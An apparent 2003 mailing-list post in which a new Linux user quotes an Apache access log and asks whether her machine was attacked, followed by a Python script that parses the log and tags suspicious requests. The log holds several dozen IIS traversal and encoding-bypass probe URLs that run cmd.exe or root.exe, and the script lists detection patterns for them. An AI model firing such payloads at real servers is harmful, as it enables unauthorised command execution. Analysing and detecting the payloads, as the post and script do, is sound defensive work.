attacked? hacked? help.....!
Lisa Durham
lisa at natec.net
Tue Dec 9 05:26:52 UTC 2003
I am very new to Linux but was poking around in my newly set up Fedora
Core 1 system today and came upon the lines below in the Apache Access
Log when I used the "System Logs" icon in the System Tools Menu.
Is the IP at the beginning of each line the IP that requested the file
that is shown at the end of the line, with the date and time in the
center? If this isn't what's shown in this file, what is this format?
What does this file tell me? Am I paranoid, or was someone trying to
access my machine (but ignorantly assuming it was a Windows machine)?
Quoted Apache access log:
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 382 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
"-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET
/scripts/nsiislog.dll" 404 331 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 382 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
"-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET
/scripts/nsiislog.dll" 404 331 "-" "-"
----------------------------------------
Thanks,
Lisa
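
The format asked about above, as an added example that is not part of the original message: a parser for Apache's "combined" access log layout (client IP, timestamp, request line, status code, response size, referer, user agent) that tags requests aimed at Windows/IIS paths. The function names, tag names and marker list are assumptions made for this illustration; the sample entries are copied from the quoted log and rejoined onto single lines.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
IIS_MARKERS = ("cmd.exe", "root.exe", "nsiislog.dll", "/winnt/")  # Windows/IIS-only names

# Four entries copied from the quoted log, each rejoined onto a single line.
SAMPLE = [
    '24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"',
    '24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"',
    '24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"',
    '211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET /scripts/nsiislog.dll" 404 331 "-" "-"',
]

def parse_line(line):
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = m["request"].split()  # method, path, optional protocol
    return {**m.groupdict(), "status": int(m["status"]),
            "path": parts[1] if len(parts) > 1 else ""}

def decode_fully(path, rounds=3):
    for _ in range(rounds):  # repeated decoding exposes %255c -> %5c -> backslash
        path = unquote(path, encoding="latin-1")
    return path

def classify(path):
    raw, dec = path.lower(), decode_fully(path).lower()
    checks = [
        ("iis-target", any(m in dec for m in IIS_MARKERS)),
        ("double-encoding", "%25" in raw or "%%" in raw),
        ("overlong-utf8", "%c0%" in raw or "%c1%" in raw),
        ("traversal", "../" in dec or "..\\" in dec),
    ]
    return [tag for tag, hit in checks if hit]

def summarize(lines):
    # Per client IP: request count, status codes returned, probe tags seen.
    out = {}
    for rec in filter(None, map(parse_line, lines)):
        e = out.setdefault(rec["host"], {"requests": 0, "statuses": set(), "tags": set()})
        e["requests"] += 1
        e["statuses"].add(rec["status"])
        e["tags"].update(classify(rec["path"]))
    return out
```

Calling `summarize(SAMPLE)` groups the entries by client IP; a status set holding only 4xx codes means the server refused or could not find every requested path.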